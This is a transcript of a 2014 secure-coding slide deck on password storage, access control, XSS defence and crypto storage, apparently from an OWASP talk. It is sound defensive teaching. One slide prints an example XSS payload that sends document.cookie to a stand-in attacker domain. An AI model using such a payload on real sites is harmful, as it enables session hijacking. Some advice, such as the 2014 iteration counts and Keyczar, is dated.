Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security presentation from Jim Manico

Security presentation from Jim Manico

Michael Isvy

August 08, 2014
Tweet

More Decks by Michael Isvy

Other Decks in Technology

Transcript

  1. Password  Storage,  XSS  Defense  
    and  Access  Control  Design
     

    View full-size slide

  2. Jim Manico
    @manicode
    OWASP  Volunteer  
    -  Global  OWASP  Board  Member  
    -  OWASP  Cheat-­‐Sheet  Series,  Top  Ten  
    Proac=ve  Controls,  OWASP  Java  
    Encoder  and  HTML  Sani=zer  Project  
    Manager  and  Contributor  
    Secure-­‐Coding  Instructor/Author  
    -  18  years  of  web-­‐based,  database-­‐
    driven  soLware  development  and  
    analysis  experience  
    -  Author  of  "Iron  Clad  Java,  Building  
    Secure  Web  Applica=ons"  with  Oracle  
    Press  and  McGraw  Hill  (Sept  2014)  
    Kama'aina  Resident  of  Kauai,  Hawaii  
    -  Aloha!  

    View full-size slide

  3. Authen9ca9on  and  Iden9ty
     

    View full-size slide

  4. Password  Storage  Defense  Overview
     
    •  Offline  A?acks  
    –  Avoid  Hashing  or  Encryp9on    
    –  Use  proper  key  deriva9on  
    func9ons  and  stretching  
    configura9ons  
    –  Use  random  and  unique  per-­‐
    user  salts  
    •  Less  effec9ve  against  
    targeted  a?acks,  but  use  
    them  anyhow  
    –  Strict  Password  Policy  
    •  Online  A?acks  
    –  Ban  top  X  commonly  used  
    passwords  
    –  Rate  limi9ng  
    –  Mul9-­‐factor  authen9ca9on  
    –  Behavior  Analysis  
    •  Trojan  Combat  
    –  An9-­‐Phishing  
    •  Early  detec9on  and  
    takedown  
    –  Good  network  security  
    reference: Openwall and http://www.openwall.com/presentations

    View full-size slide

  5. 1)  Do not limit the type of characters or
    length of user password within reason
    •  Limiting passwords to protect against
    injection is doomed to failure
    •  Use proper encoder and other defenses
    described instead
    •  Be wary of systems that allow unlimited
    password sizes (Django DOS Sept 2013)
    Password  Storage  in  the  Real  World
     

    View full-size slide

  6. 2) Use a cryptographically strong
    credential-specific salt
    •  protect( [salt] + [password] );
    •  Use a 32char or 64char salt (actual size
    dependent on protection function);
    •  Do not depend on hiding, splitting, or otherwise
    obscuring the salt
    Password  Storage  in  the  Real  World
     

    View full-size slide

  7. 3a) Impose difficult verification on the
    attacker and defender
    •  PBKDF2([salt] + [password], c=10,000,000);
    •  Use PBKDF2 when FIPS certification or
    enterprise support on many platforms is
    required
    •  Use Scrypt where resisting any/all hardware
    accelerated attacks is necessary but enterprise
    support and scale is not. (bcrypt is also a
    reasonable choice)
    Password  Storage  in  the  Real  World
     

    View full-size slide

  8. Java  7  PBKDF2
     
    byte[] pbkdf2(final char[] password, final byte[] salt,
    final int iterationCount, final int keyLength) {
    try {
    return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1")
    .generateSecret(
    new PBEKeySpec(password, salt, iterationCount, keyLength)
    ).getEncoded();
    } catch (NoSuchAlgorithmException | InvalidKeySpecException e) {
    throw new RuntimeException(e);
    }
    }
    keyLength: 2048
    iterationCount: 128,000 (2014)

    View full-size slide

  9. Password1!
     

    View full-size slide

  10. Mul9  Factor  Authen9ca9on  
    Google, Facebook, PayPal, Apple, AWS, Dropbox, Twitter
    Blizzard's Battle.Net, Valve's Steam, Yahoo

    View full-size slide

  11. Access  Control
     

    View full-size slide

  12. Most Coders Hard-Code Roles in Code
    if  (  user.isRole(  "JEDI"  )  ||  
             user.isRole(  "PADWAN"  )  ||    
             user.isRole(  "SITH_LORD"  )  ||    
             user.isRole(  "JEDI_KILLING_CYBORG"  )    
    )  {  
     log.info("You  may  use  a  lightsaber  ring.    Use  it  wisely.");  
    }  else  {  
     log.info("Lightsaber  rings  are  for  schwartz  masters.");  
    }  

    View full-size slide

  13. Solving Real World Access Control Problems
    with the Apache Shiro
    The  Problem  
    Web  Applica9on  needs  secure  access  control  mechanism  
    The  Solu9on  
    if  (  currentUser.isPermitted(  "lightsaber:wield"  )  )  {  
           log.info("You  may  use  a  lightsaber  ring.    Use  it  wisely.");  
    }  else  {  
           log.info("Sorry,  lightsaber  rings  are  for  schwartz  masters  only.");  
    }  

    View full-size slide

  14. Solving Real World Access Control Problems
    with the Apache Shiro
    The  Problem  
    Web  Applica9on  needs  to  secure  access  to  a  specific  object  
    The  Solu9on  
    int  winnebagoId  =  request.getInt("winnebago_id");  
     
    if  (  currentUser.isPermitted(  "winnebago:drive:"  +  winnebagoId)  )  {  
           log.info("You  are  permitted  to  'drive'  the  'winnebago’.  Here  are  the  keys.");  
    }  else  {  
           log.info("Sorry,  you  aren't  allowed  to  drive  this  winnebago!");  
    }  

    View full-size slide

  15. Spring  Solu9on  to  Stop  XSS?
     

    View full-size slide

  16. <br/>var badURL='https://evileviljim.com/<br/>somesite/data=' + document.cookie;<br/>var img = new Image();<br/>img.src = badURL;<br/>
    document.body.innerHTML=‘<blink<br/>>CYBER IS COOL</blink>’;
    Anatomy  of  a  XSS  A?ack  

    View full-size slide

  17. Contextual  Output  Encoding  
    (XSS  Defense)  
    – Session Hijacking
    – Site Defacement
    – Network Scanning
    – Undermining CSRF Defenses
    – Site Redirection/Phishing
    – Load of Remotely Hosted Scripts
    – Data Theft
    – Keystroke Logging
    – Attackers using XSS more frequently

    View full-size slide

  18. XSS  Defense  by  Data  Type  and  Context  
    Data  Type   Context   Defense  
    String   HTML  Body   HTML  EnKty  Encode  
    String   HTML  ALribute   Minimal  ALribute  Encoding  
    String   GET  Parameter   URL  Encoding  
    String   Untrusted  URL   URL  ValidaKon,  avoid  javascript:  URLs,  
    ALribute  encoding,  safe  URL  verificaKon  
    String   CSS   Strict  structural  validaKon,  CSS  Hex  
    encoding,  good  design  
    HTML   HTML  Body   HTML  ValidaKon  (JSoup,  AnKSamy,  HTML  
    SaniKzer)  
    Any   DOM   DOM  XSS  Cheat  Sheet  
    Untrusted  JavaScript   Any   Sandboxing  
    JSON   Client  Parse  Time   JSON.parse()  or  json2.js  
    Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing,
    class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight,
    marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan,
    scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width

    View full-size slide

  19. OWASP Java Encoder Project
    https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
    •  No third party libraries or configuration necessary
    •  This code was designed for high-availability/high-
    performance encoding functionality
    •  Simple drop-in encoding functionality
    •  Redesigned for performance
    •  More complete API (uri and uri component
    encoding, etc) in some regards.
    •  Java 1.5+
    •  Last updated February 14, 2013 (version 1.1)

    View full-size slide

  20. OWASP Java Encoder Project
    https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
    HTML Contexts
    Encode#forHtmlContent(String)
    Encode#forHtmlAttribute(String)
    Encode#forHtmlUnquotedAttribute
    (String)
    XML Contexts
    Encode#forXml(String)
    Encode#forXmlContent(String)
    Encode#forXmlAttribute(String)
    Encode#forXmlComment(String)
    Encode#forCDATA(String)
    CSS Contexts
    Encode#forCssString(String)
    Encode#forCssUrl(String)
    JavaScript Contexts
    Encode#forJavaScript(String)
    Encode#forJavaScriptAttribute(String)
    Encode#forJavaScriptBlock(String)
    Encode#forJavaScriptSource(String)
    URI/URL contexts
    Encode#forUri(String)
    Encode#forUriComponent(String)

    View full-size slide

  21. HTML  Body  Escaping  Examples
     
    OWASP  Java  Encoder  
     
    <%= Encode.forHtml(UNTRUSTED)%>
    Title:<%= Encode.forHtml(UNTRUSTED)%>

    <%= Encode.forHtmlContent(UNTRUSTED) %>

    View full-size slide

  22. HTML  A?ribute  Escaping  Examples
     
    OWASP  Java  Encoder  
     
    value="<%=
    Encode.forHtmlAttribute(UNTRUSTED) %>" />
    value=<%=
    Encode.forHtmlUnquotedAttribute(UNTRUSTED)
    %> />  

    View full-size slide

  23. URL  Parameter  Escaping  Examples
     
    OWASP  Java  Encoder  
    <%-- Encode URL parameter values --%>

    <%-- Encode REST URL parameters --%>
    >

    View full-size slide

  24. Handling Untrusted URL’s
    1)  First  validate  to  ensure  the  string  is  a  valid  URL  
    2)  Avoid  Javascript:  URL’s  
    3)  Only  allow  HTTP  or  HTTPS  only  
    4)  Check  the  URL  for  malware  inbound  and  outbound  
    5)  Encode  URL  in  the  right  context  of  display  
    UNTRUSTED URL

    View full-size slide

  25. public static String validateURL(String rawURI, boolean absoluteURLonly)
    throws ValidationException {
    // throws URISyntaxException if invalid URI
    URI uri = new URI(rawURI);
    // don't allow relative urls WHY?
    if (absoluteURLonly) {
    if (!uri.isAbsolute()) throw new ValidationException("not an absolute uri");
    }
    // don't allows javascript urls, etc...
    if (!"http".equals(uri.getScheme()) && !"https".equals(uri.getScheme())) throw
    new ValidationException("we only support http(s) urls";
    // who legitimately uses user-infos in their urls?!?
    if (uri.getUserInfo() != null) throw new ValidationException("this can only be
    trouble");
    // normalize to get rid of '.' and '..' path components
    uri = uri.normalize(); // get rid of '.' and '..'
    // check: uri.getHost() against whitelist/blacklist?
    // check: uri.getPort() for shenanigans?
    return uri.toASCIIString();
    }
    Validating Untrusted URL’s

    View full-size slide

  26. Escaping  when  managing  URL’s
     
    Assuming  the  untrusted  URL  has  been  properly  validated....  
     
    OWASP  Java  Encoder  
     

    Encode.forHtmlContext(untrustedURL)
     

    View full-size slide

  27. Advanced  XSS  Defense  With  No  Encoding!  
    1)  Deliver  main  HTML5  document  with  sta%c/safe  data  only  in  the  HTML    
    2)  Embed  JSON  on  the  page  
    <br/><%= Encoder.encodeForHTML(data.to_json) %><br/>
     
    3)  Decode  and  Parse  JSON  
     
    var dataElement = document.getElementById('init_data');
    var jsonText = dataElement.textContent ||
    dataElement.innerText
    var initData = JSON.parse(html_unescape(jsonText));
     
    4)  Parse  JSON  and  populate  the  staKc  HTML  with  safe  JavaScript  API's  
    a)  JS:  .innerText .val
    b)  JQuery:  .text .val

    View full-size slide

  28. Valida9on
     

    View full-size slide

  29. OWASP
    OWASP HTML Sanitizer Project
    https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
    •  HTML Sanitizer written in Java which lets you include HTML
    authored by third-parties in your web application while
    protecting against XSS.
    •  This code was written with security best practices in mind, has
    an extensive test suite, and has undergone adversarial
    security review
    https://code.google.com/p/owasp-java-html-sanitizer/wiki/
    AttackReviewGroundRules.
    •  Very easy to use.
    •  It allows for simple programmatic POSITIVE policy
    configuration. No XML config.
    •  Actively maintained by Mike Samuel from Google's AppSec
    team!
    •  This is code from the Caja project that was donated by
    Google. It is rather high performance and low memory
    utilization.

    View full-size slide

  30. Solving Real World Problems with the OWASP
    HTML Sanitizer Project
    The  Problem  
    Web  Page  is  vulnerable  to  XSS  because  of  untrusted  HTML  
    The  Solu9on  
    PolicyFactory  policy  =  new  HtmlPolicyBuilder()  
           .allowElements("a")  
           .allowUrlProtocols("https")  
           .allowAttributes("href").onElements("a")  
           .requireRelNofollowOnLinks()  
           .build();  
    String  safeHTML  =  policy.sanitize(untrustedHTML);  

    View full-size slide

  31. Crypto  Storage
     

    View full-size slide

  32. Solving Real World Crypto Storage Problems
    With Google KeyCzar
    The  Problem  
    Web  Applica9on  needs  to  encrypt  and  decrypt  sensi9ve  data  
    The  Solu9on  
    Crypter  crypter  =  new  Crypter("/path/to/your/keys");  
    String  ciphertext  =  crypter.encrypt("Secret  message");  
    String  plaintext  =  crypter.decrypt(ciphertext);  
    Keyczar is an open source cryptographic toolkit for Java
    Designed to make it easier and safer for developers to use cryptography in their applications.
    •  A simple API
    •  Key rotation and versioning
    •  Safe default algorithms, modes, and key lengths
    •  Automated generation of initialization vectors and ciphertext signatures
    •  Java implementation
    •  Inferior Python and C++ support because Java is way cooler

    View full-size slide

  33. @manicode  
    [email protected]  
     
     
    h?p://slideshare.net/jimmanico  
     
     
     
     
     
     
    THANK  YOU!  

    View full-size slide